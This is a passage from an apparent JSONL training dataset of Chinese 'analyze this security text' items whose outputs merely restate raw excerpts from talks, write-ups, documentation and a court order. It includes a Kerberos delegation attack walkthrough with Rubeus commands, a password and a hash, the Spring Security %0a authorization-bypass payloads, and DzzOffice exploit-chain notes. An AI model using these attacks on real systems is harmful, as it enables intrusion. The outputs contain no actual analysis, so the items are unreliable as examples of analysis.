Checkoway and Shacham  For those interested in JOP though, there was a somewhat serious problem: lack of tools to facilitate usage.  There also really isnt much practical information on doing JOP in Windows. You can download the JOP ROCKET", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: 列出当前凭证权限 --- ## 一键列出阿里云的凭证权限 使用以下命令列出当前凭证权限以及可以执行的操作 ```bash cf alibaba perm ``` ## 一键列出腾讯云的凭证权限 ```bash cf tencent perm ``` ## 一键列出华为云的凭证权限 ```bash cf huawei perm ``` ::: warning 注意 CF 列出权限的逻辑有两种方式 1. CF 会先判断当前 AK 是否具有身份访问控制的权限如果有则直接通过 API 接口获取当前 AK 的权限这种方式是最准确的 2. 如果当前 AK 不具备身份访问控制的权限那么就通过遍历 API 接口的方式判断是否有其权限目前 CF 只会遍历常见的几种资源权限因此如果 CF 提示没有发现任何权限的时候并不意味着这个 AK 真的什么权限都没有 ::: <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = \"2022年9月7日\" } } </script>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n##Repeating xor (Crypto, 400p) After entring the luxurious condomium,you get the feel that you are in home of a yester Star. the extravagant flooring and furnishings shows the richness of this star. But where is she? There she is, lying peacefuly on her couch. See what Envy has done to her...with a perfectly well maintained attractive body she still looks sex diva, except for her face beyond recogniton. Her identity is crucial to know who killed her and why? In absence of any personal data around there is only a file. with a cryptic text in it. Preity sure she has used her own name to XOR encrypt the file. And challenge is to know her name. ###PL [ENG](#eng-version) ###ENG version", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n先给LDC添加对账 kaba 的基于资源的约束委派 接着申请到标机器的票据 C:\\Users\\Administrator\\Desktop>SharpAllowedToAct.exe -m kaba -u administrator -p 1qaz2WSX -t KASPERSKY -a LDC.dev.pig.com -d dev.pig.com [+] Domain = dev.pig.com [+] Domain Controller = LDC.dev.pig.com [+] Machine added by the attacker = [+] Distinguished Name = CN=kaba,CN=Users,DC=dev,DC=pig,DC=com [+] Try login. [+] SID of the machine added by the attacker: S-1-5-21-2391806502-1831592058-3108405647-1107 [+] Attribute changed successfully [+] Done! C:\\Users\\Administrator\\Desktop>Rubeus.exe s4u /user:kaba /domain:dev.pig.com /dc:LDC.dev.pig.com /rc4:161cff084477fe596a5db81874498a24 /impersonateuser:Administrator /msdsspn:cifs/LDC.dev.pig.com ______ _ (_____ \\ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \\| ___ | | | |/___) | | \\ \\| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.0.1 [*] Action: S4U [*] Using rc4_hmac hash: 161cff084477fe596a5db81874498a24 [*] Building AS-REQ (w/ preauth) for: 'dev.pig.com\\kaba' [+] TGT request successful! [*] base64(ticket.kirbi): doIExDCCBMCgAwIBBaEDAgEWooID4DCCA9xhggPYMIID1KADAgEFoQ0bC0RFVi5QSUcuQ09NoiAwHqAD AgECoRcwFRsGa3JidGd0GwtkZXYucGlnLmNvbaOCA5owggOWoAMCARKhAwIBAqKCA4gEggOELXywoZgX J9NsLgm+ML7+N2+SpZo55VmuWW4Hh9Vq8/kZ74Mj9t9XqloUNLhwUlgFN7zo0t9soMNJwGB+VM8cvaAn yjoF2Wa46CPqNmPW3V1iY7jwWRXjLdo62Y5VHAmTDEMqqvO5xQ7AvqGwThQK7wNfbZG50W/zcSikz/rU 28mJpCuwDSYrfLt4EqYwAc2wyyu2jcKYx3LiKrKvS7O4edCy2V0ixxwLcMKcWK1aawKnnoJsYK7anGMp 7Uavq2I8S/k7OdOOeOcU93cBkLUovaB9GPZMcUxzh3OS6zepXZIRMDJaKjFgKXCoDRCIsMFqdr0+akGI dd469bHkIDqlq7nNf+h/dw+E0kynuRMYxtfkkWP29coajCZr+8e8+NcYLyU+JtscPFfX3IWSbI0QAyNU ef+W5a99qIuUr3chpqSmS1alU4w7BNSyXp4shFk0+kveXxkqO2IVdxP1XrW4Q+gxJSc06AIVliReLDU6 Mv05a0nCOzSK8fGk7jPdpKiZn4TNpBnbLSgAPS3GCDzz+TedfPmQSUAaC7kIlMJA2iBAby1y5gOad/zg 3/toZuahINjeR0EVdBoLrtrVGSS0dSG2d5MMN+pxYP1pLoo4AUnYMl+4Bs8yMYdAr/NoqvjzDsHgJEYe D/Ws0PN2sah7K6cbsloJBa+/KdncddZBxDp9ogj+GT9Ab+LRivQGJzcdigXLzEKSFAbj6JHM4Q5jkVmH 85R91tRPjFgqlN21ivZ1B+uVerfw2tHr3vdrn/yARlaz3dfuMQbH7JI+2qacFBlMqr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nRCTF2020-WP Author:Nu1L Team RCTF2020-WP RE My Switch Game play_the _game go-flag panda_trace rust-flag Cipher PWN bf Best_php note golang_interface no_write 0c WEB swoole rBlog 2020 EasyBlog Calc MISC Welcome to the RCTF 2020 mysql_interface Switch PRO Controller bean FeedBack Crypto easy_f(x) BlockChain roiscoin RE My Switch Game flagflag rumble 32joyconmaster a2 10 xx 04 b4 01 4e 04 b4 01 4e import argparse import struct import time from joycontrol.report import InputReport, OutputReport, SubCommand \"\"\" joycontrol capture parsing example. Usage: parse_capture.py <capture_file> parse_capture.py -h | --help \"\"\" def _eof_read(file, size): \"\"\" Raises EOFError if end of file is reached. \"\"\" data = file.read(size) if not data: raise EOFError() return data if __name__ == '__main__': # list of time, report tuples total = [] with open(r'F:\\path_to_shit_log\\log.log', 'rb') as capture: try: start_time = None while True: # parse capture time _time = struct.unpack('d', _eof_read(capture, 8))[0] if start_time is None: start_time = _time # parse data size size = struct.unpack('i', _eof_read(capture, 4))[0] # parse data data = list(_eof_read(capture, size)) if data[0] == 0xA1: report = InputReport(data) # normalise time total.append((_time, report)) elif data[0] == 0xA2: report = OutputReport(data) # normalise time total.append((_time, report)) else: raise ValueError(f'Unexpected data.') except EOFError: pass # Do some investigation... i = 1 count = 0 last_buttons = [0, 0, 0, 0] for each in total: data = each[1].data if data[3:] == [0x04, 0xb4, 0x01, 0x4e, 0x04, 0xb4, 0x01, 0x4e] and data[0] == 0xa2: for idx in range(4): if last_buttons[idx] == 1: print(label[idx], end=',') print('shit!') if (data[4] != 0 or data[5] != 0 or data[6] != 0) and data[0] == 0xa1 and data[1] == 0x30: time_context = time.asctime(time.localtime(each[0])) label = 'Down Up Right Left'.split() b = data[6] buttons = b & 1, (b >> 1) & 1, (b >> 2) & 1, (b >> 3) & 1 if buttons != last_buttons: count += 1 #prin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 WO IN THE UNITED STATES DISTRICT COURT FOR THE DISTRICT OF ARIZONA MDY Industries, LLC, Plaintiff/Counterdefendant, vs. Blizzard Entertainment, Inc.; and Vivendi Games, Inc., Defendants/Counterclaimants. _________________________________ Blizzard Entertainment, Inc.; and Vivendi Games, Inc., Third-Party Plaintiffs, vs. Michael Donnelly, Third-Party Defendant. ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) ) No. CV-06-2555-PHX-DGC ORDER AND PERMANENT INJUNCTION This case concerns the World of Warcraft computer game (WoW) and a software program known as Glider that plays WoW for its owners while those owners are away from their computer keyboards. MDY Industries, Inc. (MDY), the owner and distributor of Glider, sought a declaratory judgment that Glider does not infringe rights owned by Blizzard Entertainment, Inc. and Vivendi Games, Inc. (collectively, Blizzard), the owners and distributors of WoW. Dkt. #5. Blizzard filed a counterclaim and a third-party complaint against Michael Donnelly, the founder of MDY. Blizzard asserted seven claims: tortious 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 - 2 - interference with contract, contributory copyright infringement, vicarious copyright infringement, violation of the Digital Millennium Copyright Act (DMCA), trademark infringement, unfair competition, and unjust enrichment. Dkt. #10. The Court granted in part the parties summary judgment motions. The Court held MDY liable to Blizzard for tortious interference with contract, contributory copyright infringement, and vicarious copyright infringement. The Court granted summary judgment to MDY on the portion of Blizzards claim based on the DMCA that applied to Blizzards game client software code. The Court also granted summary judgment in favor of MDY on Blizzards unfair competition claim. Dkt. #82. Blizzard filed a motion for a permanent injunction on its tortious interference", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMac OS X Server Mail Service Administration For Version 10.3 or Later 034-2349_Cvr 9/12/03 7:28 AM Page 1 K Apple Computer, Inc.  2003 Apple Computer, Inc. All rights reserved. The owner or authorized user of a valid copy of Mac OS X Server software may reproduce this publication for the purpose of learning to use such software. No part of this publication may be reproduced or transmitted for commercial purposes, such as selling copies of this publication or for providing paid for support services. The Apple logo is a trademark of Apple Computer, Inc., registered in the U.S. and other countries. Use of the keyboard Apple logo (Option-Shift-K) for commercial purposes without the prior written consent of Apple may constitute trademark infringement and unfair competition in violation of federal and state laws. Apple, the Apple logo, AppleScript, AppleShare, AppleTalk, ColorSync, FireWire, Keychain, Mac, Macintosh, Power Macintosh, QuickTime, Sherlock, and WebObjects are trademarks of Apple Computer, Inc., registered in the U.S. and other countries. AirPort, Extensions Manager, Finder, iMac, and Power Mac are trademarks of Apple Computer, Inc. Adobe and PostScript are trademarks of Adobe Systems Incorporated. Java and all Java-based trademarks and logos are trademarks or registered trademarks of Sun Microsystems, Inc. in the U.S. and other countries. Netscape Navigator is a trademark of Netscape Communications Corporation. RealAudio is a trademark of Progressive Networks, Inc. 19952001 The Apache Group. All rights reserved. UNIX is a registered trademark in the United States and other countries, licensed exclusively through X/Open Company, Ltd. 034-2349/8/22/03 LL2349.Book Page 2 Friday, August 22, 2003 2:47 PM 3 1 Contents Preface 7 How to Use This Guide 7 Whats Included in This Guide 7 Using This Guide 7 Setting Up Mac OS X Server for the First Time 8 Getting Help for Everyday Management Tasks 8 Getting Additional Information Chapter 1 9 Mail Service Setup 10 Mail Ser", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTodays Modern Network Killing Robot Viki Navratilova viki@uchicago.edu Network Security Officer The University of Chicago How to Create a Network Killing Robot  Slap together different technologies  Borrow from the strengths of each  Make it easy for lots of people to use (AOL effect)  Means giving up I am an elite hacker snobbery  Widely distribute it to non-tech people  Automate everything  Distribute as much as you can over the Internet  Reduces single point of failure  Give people the ability to express themselves through the tools IRC & DOS, two great tastes that taste great together  IRC (I Repeat Classes) - Widely available networked benign application - (relatively) effective way to fulfill need to socialize - Easy to use application  DOS (Denial of Service Tools) - Effective way to communicate emotions to others - Lots of engineering effort goes into DOS tools - Always evolving in response to new ways to block them A Brief History of Denial of Service Attacks Early DOS attacks  ping of death  Simple network flood  either single very large ping packet, or a flood of large or small ping packets  smurf attack  Amplified network flood  widespread pings with faked return address (broadcast address)  syn flood  Overload the machine instead of the network  Send a bunch of SYN packets to a host on different ports to open a connection, and dont finish opening the connection Distributed Denial of Service (DDOS) Tools  trinoo,stacheldracht  faked source ip address  easy to spot and filter  Much more devastating than old DOS tools  Harder to track back to the attacker  Made famous in the media when cnn.com, yahoo.com, ebay.com DOSed for several hours  Generally required breaking into each DDOS drone by hand to install the DDOS software A Brief History of IRC Bots eggdrop bot - Jeff Fischer, 1993  download from www.eggheads.org  usually used to mind irc channels when their human ops weren't there  windows port is called windrop  still widely used today bnc  the bnc grou", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Vuex Vuex 是一个专为 Vue.js 应用程序开发的状态管理模式类似 React 中的 Redux ### 装包 ``` npm install vuex --save ``` ### 注入 store 导入 store ```javascript import store from './store' ``` 将 store 注入到组件中 ```javascript new Vue({ el: '#app', store, router, template: '<App/>', components: { App } }) ``` ### 创建 store 我们这里根据官网给出的例子创建 store 数据结构为 ![数据结构](../img/store.png) 其中`index.js` 在 store 中创建 store 并将数据组合的作用类似 Redux 中的 combineReducers ```javascript import Vue from 'vue' import Vuex from 'vuex' //引用 vuex import comment from './modules/comment' // 导入 comment 数据 Vue.use(Vuex) // 安装使用 vuex 插件 export default new Vuex.Store({ // 创建 store 并导出 modules: { comment } }) ``` Vuex 通过 Vue.use(Vuex) 提供了一种机制将状态从根组件注入到每一个子组件中 store 选项在组件需要 store 时用 `this.$store.state`调用 ```javascript const state = { all: [ { text: 'haha' }, { text: 'gege' } ] } export default { state } ``` 在 modules 文件夹中写入数据并导出 **参考**<https://vuex.vuejs.org/zh-cn/state.html> ### 读取数据 Vuex 的状态存储是响应式的从 store 实例中读取状态最简单的方法就是在 **计算属性中返回某个状态** ```js <script> export default { name: 'comment-box', // 在计算属性 computed 中 computed: { //comments 方法 comments: function () { //通过返回值拿到 store 中的数据 return this.$store.state.comment.all } } } </script> ``` 通过 comments 方法 返回的`this.$store.state.comment.all`拿到 store 中的值 将数据渲染到页面上 ```html <template> <li v-for=\"comment in reversedMessage\"> {{ comment.text }} </li> </template> ``` ### 对 store 中的数据进行修改 > 更改 Vuex 的 store 中的状态的唯一方法是提交 mutation Vuex 中的 mutations 非常类似于事件每个 mutation 都有一个字符串的 事件类型 (type) 和 一个 回调函数 (handler)这个回调函数就是我们实际进行状态更改的地方并且它会接受 state 作为第一个参数 ```javascript const mutations = { [函数名] (state) { // 变更状态 state.count++ } } }) ``` ### 提交载荷Payload > Payload 就是接受的数据 你可以向 store.commit 传入额外的参数(数据)即 mutation 的 载荷payload ```javascript const mutations = { [increment] (state, n) { //n 为组件传过来的数据 state.count += n } } ``` ### 使用常量替代 Mutation 事件类型 在 store 文件夹下创建 `mutation-types.js`文件将 Mutation 事件类型写在里面 ```javascript export const SOME_MUTATION = 'SOME_MUTATION' //声明 一个常量作为函数名 ``` ### Mutaion 函数 > store 类似于 React 中的 action ``", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nIntroduction SEH Basics Anti-RE Techniques Decrypting the Content Anti-RE Techniques in DRM Code Jan Newger Seminar on Advanced Exploitation Techniques i4, RWTH Aachen, Germany DEF CON 16 / 2008 Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content Outline 1 Introduction About DRMs Approaching the DRM 2 SEH Basics Overview Exception Dispatching 3 Anti-RE Techniques Overview Trampolines Debug Registers P-Code Machine 4 Decrypting the Content The Algorithm Demo Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content About DRMs Approaching the DRM Outline 1 Introduction About DRMs Approaching the DRM 2 SEH Basics Overview Exception Dispatching 3 Anti-RE Techniques Overview Trampolines Debug Registers P-Code Machine 4 Decrypting the Content The Algorithm Demo Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content About DRMs Approaching the DRM About this Talk What it IS Show some not-so-common Anti-RE techniques Strategies to defeat Anti-RE What it is NOT How to hack the DRM from ********* No tutorial for writing decryption tools Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content About DRMs Approaching the DRM Whats a DRM? \"Digital Rights Management\" Restrict access to content Content encrypted Decrypt online Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content About DRMs Approaching the DRM Whats a DRM? \"Digital Rights Management\" Restrict access to content Content encrypted Decrypt online Key often bound to user/hardware Prevents copying Change hardware -> new license Jan Newger Anti-RE Techniques in DRM Code Introduction SEH Basics Anti-RE Techniques Decrypting the Content About DRMs Approaching the DRM Whats a DRM? \"Digital Rights Management\" Restrict access to content Content encrypted Decrypt onlin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 安全运营工具开发 ## IOC Explorer IOC Indicator of Compromise > 关联失陷指标是安全事件调查乃至威胁狩猎的重要步骤发现一个主机的IP地址与多个恶意文件存在关联并且进一步确认这个主机旨在提供恶意文件下载服务该发现有助于让安全运营团队实施更加有效的安全预防措施比如阻断内部主机与该恶意IP的访问连接 > IOC Explorer旨在协助分析人员在所有可用的威胁情报源中自动执行迭代查询并在所有失陷指标间构建清晰的树状关系结果在减轻了人工负担的同时该工具也会协助分析人员发现更多调查线索 - 工具链接[Link](https://github.com/lion-gu/ioc-explorer) - 文章链接[Link](https://www.freebuf.com/news/211108.html) ## 威胁发现设备 TDAThreat Discovery Appliance 这个概念主要围绕威胁的发现定位和处置常常是软硬件结合的需要专家经验的当然自动化是方向 ### 全流量检测设备 部署场景主要为以下几种 - 内网部署连接内网交换机端口镜像进行流量采集 - 出口部署连接网络出口交换机的镜像端口 - 分布式探针部署探针模式并常采用分布式部署进行流量采集 - 骨干网部署高带宽场景下对采集率和还原能力有特别的要求 - 便携式部署使用特定的硬件设备可随身携带进行检测", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUtu: Saving The Internet With Hate The Grand Experiment  An experiment in sociology and computing Philosophical Foundations  Strong Identity  Reputation  Retribution Identity  Nobody knows how you are on the internet. Reputation  But, they know you're a dickhead. Retribution  And, wouldn't it be great to punish the dickheads? Technical Solutions to Social Problems  If it goes on the Interwebs, it's social. The Protocol  Sends 2 bytes for size (htons(size))  Sends the data structure  That's it. Framing, Lexemes, Grammar  Uses stackish, an XML joke.  Google for it.  S-expressions with netstrings in a FORTH stack order.  [ [ '4:test' 1234 child root  (root (child (1234 '4:test'))) Semantics  Determined by the Hub.  One Stackish node for header.  Another for body. Data Encoding  Always ASCII text, but you can put anything you want in BLOBs. Simplicity Is Key  2 bytes for frame  Stackish for header and body  Easy to implement Security Preventions  Client does all the work first.  Client is considered hostile.  Booted immediately.  A Finite State Machine controls. The Cryptography I'M NOT A CRYPTOGRAPHER  I didn't write any crypto  Followed the rules Standards Used  AES 32-byte (256 bits)  ECC 32-byte (256 bits)  SHA256 hashes  128 bit random nonces  ISO/IEC 11770-3 Mechanism 6 without the Helsinki vulnerability  CCM based encryption with AAD  Fortuna PRNG Implementations  utuprotocol.info for server  ihate.rubyforge.org for client Secure Coding Practices Valgrind, Valgrind, Valgrind  All code is ruthlessly run through it.  Uh, except you can't run ruby through it.  Sigh, ruby sucks. Statistical Quality Control  Collect information on  Valgrind errors  Unit test errors  Logged Errors  Analyze the change over time Code Auditing  Review my code repeatedly.  Consistent rules I follow  Assume it's always broken C Coding Practices  Bstring library for strings  All functions have validations  Assert  preconditions/postconditions  Extensive unit testing Secure Unix Server Practi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPUT ON YOUR TINFO_T HAT MIAUBIZ DEFCON 23 AUGUST 7TH 2015 C++ templates template <typename Type> Type max(Type a, Type b) { return a > b ? a : b; } specialized char max<char>(char a, char b) { return a > b ? a : b; } specialized uint32_t max<uint32_t>(uint32_t a, uint32_t b) { return a > b ? a : b; } C++ Templates `anonymous namespace'::OpenBSDTargetInfo<`anonymous namespace'::SparcV8TargetInfo>::getOSDefines( clang::LangOptions const&,llvm::Triple const&,clang::MacroBuilder &) templates std::__1::list<std::__1::basic_string<char,std::__1:: char_traits<char>,std::__1::allocator<char>>,std::_ _1::allocator<std::__1::basic_string<char,std::__1:: char_traits<char>,std::__1::allocator<char>>>>::er ase(std::__1::__list_const_iterator<std::__1::basic_ string<char,std::__1::char_traits<char>,std::__1::all ocator<char>>,void *>,std::__1::__list_const_iterator<std::__1::basic_st ring<char,std::__1::char_traits<char>,std::__1::allo cator<char>>,void *>) THREE WAYS TO FIX THIS. SOLUTION 1 idc.GetTinfo Python> idc.GetTinfo(idc.here()) ('\\x0cp\\x05\\x03\\xffA\\n=\\x04# \\x99m\\n=\\x04#\\x95v', '\\x05this \\x01') idc.GetTinfo the type: \\x0cp\\x05\\x03\\xffA \\n=\\x04#\\x99m\\n=\\x04#\\x95v the args: \\x05this\\x01 idc.ApplyType idc.ApplyType(ea, idc.GetTinfo(ea)) True reverse the IDA \\x0cp\\x05\\x03\\xffA\\n=\\x04# \\x99m\\n=\\x04#\\x95v the juicy bit \\n= \\x04 # \\x99m \\n= \\x04 # \\x95v * etc length ordinal follows the ordinal Local Type Ordinals get ordinal by name decode the ordinal \\x99m -> 0x996d decode the ordinal 0x996d -> (0x99&0x7f) * 0x40 + (0x6d & ~0x40) -> 1645 decode the ordinal \\x95v -> 0x9575 decode the ordinal 0x9575 -> (0x95 & 0x7f) * 0x40 + (0x76 & ~0x40) -> 1398 so 1645 and 1398 encode an ordinal ((ordinal >> 6) & 0xff | 0x80) + (ordinal & 0x3f | 0x40) reconstitute the string Python> idc.ApplyType(idc.here(), ('\\x0cp\\x05\\x03\\xffA\\n=\\x04#AA \\n=\\x04#bb', '\\x05this\\x01')) True SOLUTION 2: TYPES CAN HAVE ANY NAME types can have any name rename all types rename all involved types to benign names set ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 SPARR W: A Novel Covert Communication Scheme Exploiting Broadcast Signals in LTE, 5G & Beyond Reza Soosahabi, Chuck McAuley Application & Threat Intelligence Research Center 2 WHO 3 4 MOTIVATION 5 Motivation  Past research experience in wireless security  Worked with US operators before joining Keysight in 2018.  Researched data exfiltration techniques at ATI that are lesser known in wireless community.  Trying to impress a cool boss who drops a big money Base- Station emulator equipment on your lap to do open field research!  The satellite talk in DEFCON 28  Whispers Among the Stars: Perpetrating (and Preventing) Satellite Eavesdropping Attacks  James Pavur New Job Old Job W H AT M A D E M E D O I T ! 6 Motivation  Covert Communication: a potential threat  Hacker Mentality: Exploit [Software]  Tunnelling via 3-7 protos: ICMP, DNS, etc  Challenged by Security Boxes: IPS, IDS, LI F I N D I N G M I S S I N G P I E C E Application TCP/UDP IP MAC PHY Application TCP/UDP IP MAC PHY Exploit MAC?  Engineer Mentality: Build [Hardware]  Building L1 (radios): Spread Spectrum, Ham Radios, etc  Signal blocking e.g. indoor to outdoor  Avoiding spectrum monitoring a.b.c.d x.y.z.t 7 Motivation  Exploit MAC standard weakness in cellular & satellite,   Radio height makes RF signals unstoppable.  What if: Trudy bounces a broadcast signal of from ANY powerful Wireless Access Node to Ricky!? E X P L O I T I N G A C C E S S R A D I O S 𝑚𝑖 Ricky Trudy This Photo by Unknown Author is licensed under CC BY-SA This Photo by Unknown Author is licensed under CC BY-SA-NC This Photo by Unknown Author is licensed under CC BY-SA 8 EXPLOITING LTE & 5G STANDARD WEAKNESS 9 M E D I U M A C C E S S C O N T R O L What is the MAC layer? This Photo by Unknown Author is licensed under CC BY-SA This one Media Layers Host Layers 10 LTE/5G Big MAC Layers! Terminology Quick Start: UE (User Equipment)  Phone, Tablet, Laptop, Things with SIM! eNodeB / gNodeB  Cell Tower for LTE/5G  No one knows what happened t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nzcat === 显示压缩包中文件的内容 ## 补充说明 **zcat命令** 用于不真正解压缩文件就能显示压缩包中文件的内容的场合 ### 语法 ```shell zcat(选项)(参数) ``` ### 选项 ```shell -S指定gzip格式的压缩包的后缀当后缀不是标准压缩包后缀时使用此选项 -c将文件内容写到标准输出 -d执行解压缩操作 -l显示压缩包中文件的列表 -L显示软件许可信息 -q禁用警告信息 -r在目录上执行递归操作 -t测试压缩文件的完整性 -V显示指令的版本信息 -l更快的压缩速度 -9更高的压缩比 ``` ### 参数 文件指定要显示其中文件内容的压缩包", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Spring Security CVE-OLOO-OOXVW漏洞分析 先查看官公告 https://spring.io/blog/2022/05/15/cve-2022-22978-authorization-bypass-in- regexrequestmatcher 注意到和 RegexRequestMatcher 有关在官仓库找到了最近修改 和 RegexRequestMatcher 有关的代码 https://github.com/spring-projects/spring- security/commit/472c25b5e8b7374ba7e1b194ea09f43601f6f1c2 漏洞简单分析 2 从测试例可以看到就是\\n\\r绕过正则判断如开发做了如下配置 意味着除了/login以为的任何路径都需要授权才能访问此时如果我们输 /xxx/aaa%0ag 配置的正 则会匹配不上我们访问的路径就绕过了权限校验 Java 复制代码 @Override protected void configure(HttpSecurity http) throws Exception { http.csrf().disable(); http.authorizeRequests() .requestMatchers(new RegexRequestMatcher(\".*\",null)).authenticated()//配置拦截所有请求 .antMatchers(\"/login\").permitAll();//配置/login不拦截 } 1 2 3 4 5 6 7 3 第眼看这个洞肯定想到 /%0a/../admin 这样绕然后访问admin先不管 Spring Security 是 去匹配路径规范化以后的路径还是原始的 Spring Security 在此之前还有个 Firewall 就会 拦截这种请求然后想着要是不能把这个%0a给弄掉怎么去访问到路由呢不可能有谁真的写个带回 换的路由吧 基于上的思考概想到两种可场景 有的路由会像下这样配置 我们配置了上的权限校验以后正常访问 /test/xxx 是403 访问 /test/xxxx%0a 成功绕过权限校验 实际利场景 场景 Java 复制代码 @ResponseBody @RequestMapping(\"/test/*\") public String test(){ return \"test\"; } 1 2 3 4 5 4 使了路径参数代码如下 /test1/xxxx 403 /test1/xxxx%0a 200 场景 Java 复制代码 @ResponseBody @RequestMapping(\"/test1/{path}\") public String test1(@PathVariable String path){ return \"test1\"+path; } 1 2 3 4 5 5", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDzzOfficeRCEPHP  dzz/connect/oauth.php SQLI  $_GET['bz'] dzz_io::authorize() dzz_io::initIO() $_GET['bz'] io_dzz io_baiduPCS io_ALIOSS io_disk authorize() io_disk $this->_xss_check(); $_POST $_GET $this->_xss_check(); $_POST Discuz Discuz Discuz authkey random() Discuz authkey Discuz Discuz authcode() authcode() authkey[-10] authcode() dzz/shares/index.php authcode() authkey[-10] authkey[-10] tpQC  php_mt_seed   php_mt_seed authkey[-10] authkey[-10] 166*305=5117050880 authkey authkey authkey dzzdecode( core/api/wopi/index.php RCE  Wopi::PutFile()  IO::setFileContent()  self::clean()  ( \"\\n\", \"\\r\", '../') ..././ self::initIO() $io->setFileContent() io_disk  path", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 1 2 2 3 3 4 4 5 5 6 6 D D C C B B A A NOTE: RESISTORS ARE IN OHMS +/- 5% AND CAPACITORS ARE IN MICROFARADS UNLESS OTHERWISE NOTED. SEE BOM FOR ACTUAL VOLTAGE AND SPECIFICATION. 3V3 E0 1 E1 2 E2 3 GND 4 SDA 5 SCL 6 WC 7 VCC 8 U4 24LC512-I/SN 1 2 Y1 5.0MHz 3V3 3V3 #RES PROPRX PROPTX PROPSDA PROPSCL 4/19/2013 B B 2 1 Joe Grand JTAGulator: Main SIZE DATE REV SHT OF TITLE DRAWN BY FILENAME Distributed under a Creative Commons Attribution 3.0 US license 10k R4 10k R3 3V3 10uF C7 VIN 3 VO 2 GND 1 VO 4 U6 LD1117S33 0.1uF C6 5V0 3V3 470 R5 270 R6 Red Green LEDR LEDG 3V3 3V3 3V3 P0 P1 P2 P3 P4 P5 P6 P7 VSS 39 VDD 8 VSS 27 P31 38 P30 37 P29 36 P28 35 P26 33 P27 34 VDD 18 VSS 17 VSS 5 VDD 30 VDD 40 XI 28 XO 29 RES 7 BOE 6 P25 32 P24 31 P7 4 P6 3 P5 2 P4 1 P2 43 P3 44 P1 42 P0 41 P15 16 P14 15 P13 14 P12 13 P10 11 P11 12 P9 10 P8 9 P23 26 P22 25 P21 24 P20 23 P18 21 P19 22 P17 20 P16 19 U2 PROPELLER (P8X32A-Q44) To Host TEST 26 RTS 3 DCD 10 RI 6 GND 18 GND 21 VCC 20 TXD 1 CTS 11 CBUS0 23 3V3OUT 17 DTR 2 RXD 5 CBUS1 22 OSCI 27 DSR 9 USBDM 16 OSCO 28 USBDP 15 VCCIO 4 RESET 19 AGND 25 GND 7 CBUS2 13 CBUS3 14 CBUS4 12 U1 FT232RL 1 2 3 4 5 P1 UX60-MB-5S8 0.1uF C3 USBDM USBDP USB Mini B 8 5 3 2 6 7 4 1 U5 AD8655ARZ 5V0 0.1uF C11 5V0 1 2 3 D1 WP59EGW 0.1uF C12 0.1uF C13 0.1uF C14 0.1uF C15 100k R9 18k R7 8.2k R8 1000pF C4 470pF C5 VADJ DACOUT 4.7uF C8 VUSB 0.01uF C1 SW1 SPST 0.01uF C2 10k R2 Q1 2N3904 P8 P9 P10 P11 P12 P13 P14 P15 P16 P17 P18 P19 P20 P21 P22 P23 0.1uF C9 VUSB 220R@100MHz L1 0-3.3V @ 256 steps ~13mV/step ~150mA max. Iout IN 7 OUT 6 EN 1 FLG 2 GND 3 OUT 8 U3 MIC2025-2YM 5V0 VUSB 10k R1 4.7uF C10 5V0 VUSB TXSOE P[23...0] PIC101 PIC102 COC1 PIC201 PIC202 COC2 PIC301 PIC302 COC3 PIC401 PIC402 COC4 PIC501 PIC502 COC5 PIC601 PIC602 COC6 PIC701 PIC702 COC7 PIC801 PIC802 COC8 PIC901 PIC902 COC9 PIC1001 PIC1002 COC10 PIC1101 PIC1102 COC11 PIC1201 PIC1202 COC12 PIC1301 PIC1302 COC13 PIC1401 PIC1402 COC14 PIC1501 PIC1502 COC15 PID101 PID102 PID103 COD1 PIL101 PIL102 COL1 